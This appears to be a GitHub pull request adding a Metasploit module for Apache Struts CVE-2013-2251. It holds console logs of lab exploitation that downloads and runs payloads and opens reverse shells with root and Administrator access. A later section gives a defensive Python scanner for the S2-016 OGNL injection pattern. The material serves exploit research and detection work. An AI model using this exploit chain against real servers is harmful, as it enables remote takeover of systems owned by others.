
Add module for CVE-2013-2251 #2151

Merged
merged 3 commits into from Jul 24, 2013

Conversation

jvazquez-r7
Contributor

Uses a different exploitation technique than the other available Struts exploits to avoid character restrictions.

Tested on Struts 2.3.15 on Windows 2003 SP2 and Ubuntu 10.04:

msf exploit(struts_poc) > set rhost 192.168.172.136
rhost => 192.168.172.136
msf exploit(struts_poc) > check
[+] The target is vulnerable.
msf exploit(struts_poc) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.136:8080 - Target autodetection...
[+] 192.168.172.136:8080 - Windows target found!
[*] 192.168.172.136:8080 - Encoding payload into vbs/javascript/hta...
[*] 192.168.172.136:8080 - Starting up our web service on 192.168.172.1:8080 ...
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://10.6.0.165:8080/
[*] 192.168.172.136:8080 - Execute payload through malicious HTA...
[*] 192.168.172.136:8080 - Waiting for the victim to request the payload...
[*] 192.168.172.136:8080 - Sending the payload to the server...
[*] Sending stage (751104 bytes) to 192.168.172.136
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.136:1188) at 2013-07-24 08:48:20 -0500
[-] Failed to delete C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\jprh.exe
[!] This exploit may require manual cleanup of: jprh.exe

meterpreter > getuid
Server username: JUAN-6ED9DB6CA8\Administrator
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.136 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(struts_poc) > set payload linux/x86/shell/reverse_tcp 
payload => linux/x86/shell/reverse_tcp
msf exploit(struts_poc) > set RHOST 192.168.172.166
RHOST => 192.168.172.166
msf exploit(struts_poc) > set RPORT 8080
RPORT => 8080
msf exploit(struts_poc) > check
[+] The target is vulnerable.
msf exploit(struts_poc) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.166:8080 - Target autodetection...
[+] 192.168.172.166:8080 - Linux target found!
[*] 192.168.172.166:8080 - Starting up our web service on 192.168.172.1:8080 ...
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://10.6.0.165:8080/
[*] 192.168.172.166:8080 - Downloading payload to /tmp/SNPptJQOGx...
[*] 192.168.172.166:8080 - Waiting for the victim to request the payload...
[*] 192.168.172.166:8080 - Sending the payload to the server...
[*] 192.168.172.166:8080 - Make payload executable...
[*] 192.168.172.166:8080 - Execute payload...
[*] Sending stage (36 bytes) to 192.168.172.166
[*] Command shell session 2 opened (192.168.172.1:4444 -> 192.168.172.166:34472) at 2013-07-24 08:49:16 -0500
[!] This exploit may require manual cleanup of: /tmp/SNPptJQOGx

id
uid=0(root) gid=0(root) groups=0(root)
^C
Abort session 2? [y/N]  y

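A defensive counterpart to the module's `check`, added here as an example that is not part of this pull request or of the Metasploit module: it scans access-log lines for the request pattern CVE-2013-2251 abuses. It assumes the Struts S2-016 behaviour (DefaultActionMapper evaluated OGNL in parameter names prefixed `action:`, `redirect:` or `redirectAction:`) and combined-log format; the log lines and the `probe` expression are constructed, not taken from the page.

```python
import re
from urllib.parse import unquote, urlsplit

# Parameter-name prefixes DefaultActionMapper handled before the S2-016 fix.
MAPPER_PREFIXES = ("action:", "redirect:", "redirectAction:")
OGNL_MARKER = re.compile(r"[%$]\{")  # start of an OGNL expression
# Request portion of a combined-format access-log line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines: a plain request, a benign OGNL probe in a
# "redirect:" parameter name, and a legitimate "redirectAction:" navigation.
LOG_LINES = [
    '10.0.0.5 - - [24/Jul/2013:08:48:10 -0500] "GET /app/HelloWorld.action HTTP/1.1" 200 1234',
    '10.0.0.9 - - [24/Jul/2013:08:48:12 -0500] "GET /app/HelloWorld.action?redirect:%24%7B%27probe%27%7D HTTP/1.1" 302 0',
    '10.0.0.7 - - [24/Jul/2013:08:48:15 -0500] "GET /app/HelloWorld.action?redirectAction:login HTTP/1.1" 302 0',
]


def suspicious_params(request_target):
    """Return the decoded query segments that use a mapper prefix and carry
    an OGNL expression marker; an empty list means nothing matched."""
    hits = []
    for segment in urlsplit(request_target).query.split("&"):
        # Decode twice: scanners frequently double-encode the expression.
        decoded = unquote(unquote(segment))
        if decoded.startswith(MAPPER_PREFIXES) and OGNL_MARKER.search(decoded):
            hits.append(decoded)
    return hits


def scan_log(lines):
    """Return (client_ip, decoded_segment) pairs for every flagged request."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        client_ip = line.split(" ", 1)[0]
        for hit in suspicious_params(match.group("target")):
            findings.append((client_ip, hit))
    return findings


if __name__ == "__main__":
    for ip, hit in scan_log(LOG_LINES):
        print(f"S2-016 pattern from {ip}: {hit}")
```

A plain `redirectAction:login` is not flagged, only a prefixed parameter that also contains `${` or `%{`, so the check separates the vulnerable feature's normal use from an expression injection attempt.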

@Meatballs1
Contributor

No Java target? :)

@wvu
Contributor

wvu commented Jul 24, 2013

Testing!

@wvu
Contributor

wvu commented Jul 24, 2013

Latest commit fixes the following error:

[-] Exploit failed: undefined method `remove_resource' for nil:NilClass

Thanks, @jvazquez-r7!

@wvu
Contributor

wvu commented Jul 24, 2013

Tested successfully! @wchen-r7 tested, too.

wvu added a commit that referenced this pull request Jul 24, 2013
@wvu wvu merged commit 7641aa3 into rapid7:master Jul 24, 2013
@ghost ghost mentioned this pull request Aug 18, 2013
@jvazquez-r7 jvazquez-r7 deleted the struts_default_action_mapper branch November 18, 2014 15:57